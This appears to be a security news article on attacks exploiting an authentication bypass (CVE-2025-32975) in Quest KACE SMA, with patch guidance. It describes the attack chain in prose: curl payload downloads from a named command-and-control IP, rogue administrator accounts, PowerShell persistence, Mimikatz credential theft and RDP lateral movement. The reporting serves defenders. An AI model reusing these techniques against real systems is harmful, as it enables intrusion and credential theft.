According to new research, hackers are actively using a serious flaw in Quest KACE Systems Management Appliance (SMA) to get into systems without permission, steal credentials, and move laterally across corporate networks This article explores hackers actively using. . The flaw, known as CVE-2025-32975, affects the appliance's Single Sign-On (SSO) authentication system and lets attackers get around authentication altogether.

This lets bad actors pretend to be real users without having to have valid login information, which gives them full administrative control over systems that are vulnerable. Many businesses use Quest KACE SMA to manage all of their endpoints from one place, including deploying software, patching, and monitoring devices. Attackers want to get into it because it is so deeply integrated into business environments. A patch for the hole was released in May 2025, but many businesses have not yet updated their systems.

Because of this, appliances that are unpatched and connected to the internet are now being actively targeted in the wild. Researchers saw exploitation activity start the week of March 9, 2026. Arctic Wolf's security researchers found that once attackers get in through the authentication bypass, they quickly set up shop in the compromised environment.

They use the built-in KPluginRunProcess feature to run commands on other computers, often using Base64-encoded payloads to avoid being found. In attacks that were seen, threat actors used simple curl commands to get more malicious payloads from an external command-and-control server with the IP address 216.126.225.156. This shows a simple but effective way to stage more breaches. To stay persistent, attackers misuse real system processes like runkbot.exe to make unauthorized administrative accounts.

These fake accounts are then added to local and domain administrator groups, which makes sure that they can still get in even if the original entry point is found. The attackers also use sneaky PowerShell scripts, like Enable-UpdateServices.ps1 and taskband.ps1, to change registry settings and set up long-term backdoor access. These changes let the bad thing stay on the system even after it has been rebooted or routine maintenance has been done.

Once persistence is secured, the next step is to gather credentials and do internal reconnaissance. Attackers use Mimikatz, which is sometimes disguised as harmless executables like asd.exe, to get plaintext credentials directly from system memory. They use these credentials to find high-value targets and map out the network environment.

Researchers saw lateral movement through Remote Desktop Protocol (RDP), which let attackers get into important systems like domain controllers and enterprise backup systems, even those that use Veeam and Veritas software. This level of access greatly raises the risk of a large-scale breach, data theft, or even the use of ransomware. Experts in security strongly suggest that businesses fix the affected systems right away.

If you are using an older version, such as 13.0, 13.1, or 13.2, you should update to version 13.0.385, 13.1.81, or 13.2.183 or later. Version 14.0 needs Patch 5 (14.0.341) for newer deployments, and version 14.1 needs Patch 4 (14.1.101). Organizations should not only patch their systems, but they should also keep KACE SMA interfaces from being seen on the public internet. Limiting access through VPNs or secure network boundaries can greatly lower the attack surface and stop people from using it without permission.

The ongoing campaign shows how dangerous unpatched systems are and how quickly attackers can use known vulnerabilities to get into business networks. In Google, make ZeroOwl your main source.